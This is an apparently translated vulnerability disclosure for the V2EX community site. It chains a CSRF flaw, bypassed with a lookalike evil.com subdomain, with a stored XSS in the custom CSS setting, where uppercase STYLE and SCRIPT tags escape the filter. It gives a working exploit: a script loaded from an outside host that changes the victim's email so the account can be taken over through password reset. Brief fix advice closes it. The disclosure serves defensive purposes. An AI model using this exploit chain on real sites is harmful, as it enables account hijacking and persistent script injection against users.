Rookit xss caused by a function defect of V2EX

. Rootkit xss indicates that you can control an account for a long time. This XSS is triggered every time users access v2ex. In this way, we have an xss shell.
1. the risk of account theft caused by a CSRF is due to a defect in the method of determining the path, so we can bypass the following method: Resolve a subdomain name of evil.com to v2ex.com.evil.com, then, the cross-domain post request through v2ex.com.evil.com is sent to v2ex.com/setting to set the information. attack method: Construct a page and automatically submit a post form on the page to v2ex to modify the user's mailbox. Then, we can change the password through the password reset function. 2. the rootkit xss V2EX Community allows you to customize css, but the custom css is output to html every time, which leads to the possibility of being closed. I did some tests and found that </style> and <script> are filtered, but they are not filtered in uppercase. POC: </STYLE> <SCRIPT> alert (1) </SCRIPT> with the preceding CSRF vulnerability, We can configure the user's personalized css code to implant rootkit xss across domains.

Exp:

<script src="http://mmme.me/xss.js"></script><script>xss.csrf('http://v2ex.com/settings',{'email':'pkav@gmail.com','bio':123,'list_rich':0,'show_balance':1,'show_hi_dpi':0,'show_my_nodes':0,'use_my_css':1,'my_css':'</STYLE><SCRIPT>alert(/pkav/)<\/SCRIPT>','show_ads':1});</script>

  Solution:

I mentioned this vulnerability once with @ Livid, but it seems that I have not accepted my repair suggestions. at that time, no verification was performed, and the custom css can be closed through </st </style> yle>. 1. csrf can be verified using token. the custom css does not have csrf, and this module does not have to be filtered.